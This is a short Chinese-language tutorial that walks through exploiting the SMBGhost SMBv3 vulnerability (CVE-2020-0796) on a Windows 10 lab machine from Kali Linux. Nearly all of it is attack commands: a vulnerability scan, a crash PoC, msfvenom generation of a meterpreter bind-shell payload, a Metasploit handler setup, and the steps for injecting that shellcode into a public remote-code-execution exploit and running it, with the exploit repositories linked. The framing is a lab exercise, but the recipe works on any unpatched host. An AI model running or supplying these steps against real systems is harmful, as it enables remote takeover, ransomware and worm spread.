永恒之蓝 2.0 来了,基于 SMBv3 的漏洞,Windows 8和Windows Server 2012 - Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。
目标机:windows10 1903 x64 ip:192.168.65.134(关闭防火墙)
攻击机:kali ip:192.168.65.130
1.查看攻击机是否可以攻击
┌──(rootkali)-[~]
└─# python3 scanner.py 192.168.65.134
检测工具下载地址:https://github.com/ollypwn/SMBGhost
POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC
将脚本文件命名2放到mnt目录下
┌──(rootkali)-[/mnt/2]
└─# python3 CVE-2020-0796.py 192.168.65.134
开始攻击
攻击成功
3.1生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
4.监听端口(正向连接的话一定要配置监听,不然会出现反弹不回来)
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 192.168.65.134 //目标主机
run
脚本下载:
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)
https://github.com/chompie1337/SMBGhost_RCE_PoC
5.开始攻击
┌──(rootkali)-[/mnt/1]
└─# python3 exploit.py -ip 192.168.65.134